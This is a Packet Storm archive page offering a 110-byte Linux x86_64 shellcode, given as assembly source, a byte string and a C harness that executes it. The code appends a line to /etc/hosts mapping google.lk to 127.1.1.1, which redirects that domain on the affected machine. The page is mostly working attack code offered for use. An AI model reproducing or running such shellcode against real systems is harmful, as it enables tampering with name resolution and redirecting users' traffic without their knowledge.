exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google.lk Mapping Addition To /etc/hosts Shellcode

Google.lk Mapping Addition To /etc/hosts Shellcode
Posted Oct 29, 2014
Authored by Osanda Malith

110 byte shellcode that adds an entry for google.lk to /etc/hosts.

tags | shellcode
SHA-256 | 2a29f118b2f3d44252f36a47223954660e1741b17e76194ef86d6c3da1d82e4d

Google.lk Mapping Addition To /etc/hosts Shellcode

Change Mirror Download
/*
; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start
section .text

_start:
;open
xor rax, rax
add rax, 2 ; open syscall
xor rdi, rdi
xor rsi, rsi
push rsi ; 0x00
mov r8, 0x2f2f2f2f6374652f ; stsoh/
mov r10, 0x7374736f682f2f2f ; /cte/
push r10
push r8
add rdi, rsp
xor rsi, rsi
add si, 0x401
syscall

;write
xchg rax, rdi
xor rax, rax
add rax, 1 ; syscall for write
jmp data

write:
pop rsi
mov dl, 19 ; length in rdx
syscall

;close
xor rax, rax
add rax, 3
syscall

;exit
xor rax, rax
mov al, 60
xor rdi, rdi
syscall

data:
call write
text db '127.1.1.1 google.lk'
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x02\x48"
"\x31\xff\x48\x31\xf6\x56\x49\xb8"
"\x2f\x65\x74\x63\x2f\x2f\x2f\x2f"
"\x49\xba\x2f\x2f\x2f\x68\x6f\x73"
"\x74\x73\x41\x52\x41\x50\x48\x01"
"\xe7\x48\x31\xf6\x66\x81\xc6\x01"
"\x04\x0f\x05\x48\x97\x48\x31\xc0"
"\x48\x83\xc0\x01\xeb\x18\x5e\xb2"
"\x13\x0f\x05\x48\x31\xc0\x48\x83"
"\xc0\x03\x0f\x05\x48\x31\xc0\xb0"
"\x3c\x48\x31\xff\x0f\x05\xe8\xe3"
"\xff\xff\xff\x31\x32\x37\x2e\x31"
"\x2e\x31\x2e\x31\x20\x67\x6f\x6f"
"\x67\x6c\x65\x2e\x6c\x6b";


int
main() {
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();

}
/*EOF*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close